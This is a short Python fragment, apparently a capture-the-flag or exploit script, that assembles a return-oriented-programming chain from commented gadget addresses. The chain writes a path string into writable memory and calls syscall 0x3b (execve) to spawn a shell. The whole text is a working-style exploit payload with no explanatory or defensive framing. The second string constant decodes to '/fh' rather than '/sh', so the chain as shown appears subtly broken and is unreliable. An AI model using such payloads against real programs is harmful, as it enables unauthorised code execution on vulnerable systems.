payload = p64(0x4017d3)
#0x00000000004017d3: pop rdi; ret; 
payload += p64(0x417070)+p64(0x4099ab)
# 0x00000000004099ab: pop rax; ret; 
payload += p64(0x6e69622f)+p64(0x409cc3)
# 0x0000000000409cc3: stosd dword ptr [rdi], eax; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x417074)+p64(0x4099ab)
# 0x00000000004099ab: pop rax; ret; 
payload += p64(0x68662f)+p64(0x409cc3)
# 0x0000000000409cc3: stosd dword ptr [rdi], eax; ret; 
payload += p64(0x4099ab)
# 0x00000000004099ab: pop rax; ret; 
payload += p64(0x0)+p64(0x408458)
# 0x0000000000408458: xchg eax, edx; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x417070)+p64(0x403dc1)
# 0x0000000000403dc1: pop rsi; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x4099ab)
# 0x00000000004099ab: pop rax; ret; 
payload += p64(0x3b)+p64(0x4042f0)
# 0x00000000004042f0: syscall; 
payload += b''
